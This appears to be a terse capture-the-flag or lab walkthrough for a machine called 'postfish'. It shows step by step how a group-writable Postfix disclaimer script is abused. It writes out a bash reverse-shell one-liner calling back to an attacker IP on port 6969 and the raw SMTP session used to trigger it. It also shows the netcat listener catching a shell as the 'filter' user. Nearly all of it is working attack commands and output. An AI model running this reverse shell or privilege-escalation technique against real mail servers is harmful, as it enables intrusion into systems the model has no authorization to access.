8 exploit /etc/postfix/disclaimer

# as this file is writble by group filter
brian.moore@postfish:~$ ls -la /etc/postfix/disclaimer
-rwxrwx--- 1 root filter 1184 Aug 25 00:39 /etc/postfix/disclaimer

# we are a part of group filter
brian.moore@postfish:~$ id
uid=1000(brian.moore) gid=1000(brian.moore) groups=1000(brian.moore),8(mail),997(filter)

# updat /etc/postfix/disclaimer to top of file
bash -i >& /dev/tcp/192.168.49.175/6969 0>&1

# either restart service 
# or send email to get shell

brian.moore@postfish:/etc/postfix$ service postfix restart
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to restart 'postfix.service'.
Authenticating as: root
Password:

# cannot restart service; as its run by root
# sending email

$ nc -vn 192.168.175.137 25
(UNKNOWN) [192.168.175.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
HELO x
250 postfish.off
MAIL FROM: kashz
250 2.1.0 Ok
RCPT TO: it@postfish.off
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
YeeHaw!
-$
.
250 2.0.0 Ok: queued as 656C0458FC

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.49.175] from (UNKNOWN) [192.168.175.137] 57334
bash: cannot set terminal process group (32777): Inappropriate ioctl for device
bash: no job control in this shell
filter@postfish:/var/spool/postfix$ whoami;id
whoami;id
filter
uid=997(filter) gid=997(filter) groups=997(filter)